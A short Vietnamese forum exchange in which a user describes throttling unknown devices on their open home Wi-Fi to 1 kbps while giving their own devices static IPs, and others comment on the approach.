Chơi chặn mac thì kì quá, em để open nhưng limit băng thông, đăng ký cấp ip tinhx cho từng thiết bị nên chỉ vài máy chạy max băng thông
Còn lại thì 1kbps :)))))
Chơi vậy thì đâu có ác đâu nhỉ. Nhà mạng nó hay bóp băng thông nhưng chắc nó phải gọi bạn là sư phụ.
 

strancongtu2

Búa Gỗ Đôi
Cách này cũng ổn, chứ các kỹ thuật khác dò pass hoặc PIN thì hầu hết cách thiết bị mới bây giờ đều có cơ chế bảo vệ rồi.
 


Top